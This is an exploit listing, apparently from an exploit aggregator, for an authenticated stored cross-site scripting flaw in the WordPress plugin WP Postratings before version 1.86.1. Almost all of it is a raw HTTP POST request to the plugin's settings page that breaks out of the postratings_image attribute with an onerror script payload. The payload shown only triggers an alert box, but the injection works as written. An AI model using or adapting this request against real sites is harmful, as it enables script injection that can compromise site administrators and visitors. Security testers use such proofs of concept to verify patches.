Exploit for WP Postratings < 1.86.1 - Authenticated Stored Cross-Site Scripting

Name: Exploit for WP Postratings < 1.86.1 - Authenticated Stored Cross-Site Scripting
Rating: 5 (60 reviews)

2020-12-24 | CVSS 1.3

## https://sploitus.com/exploit?id=WPEX-ID:D2D9A789-EDAE-4AE1-92AF-E6132DB7EFCD
POST /wp-admin/admin.php?page=wp-postratings/postratings-options.php HTTP/1.1
Host: example
[SNIPPED]
Content-Type: application/x-www-form-urlencoded
Content-Length: 1954
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

_wpnonce=fad0d9fb37&postratings_image=plusminus_crystal\"+onerror=alert(/XSS/);/&postratings_max=2&[SNIPPED]&Submit=Save+Changes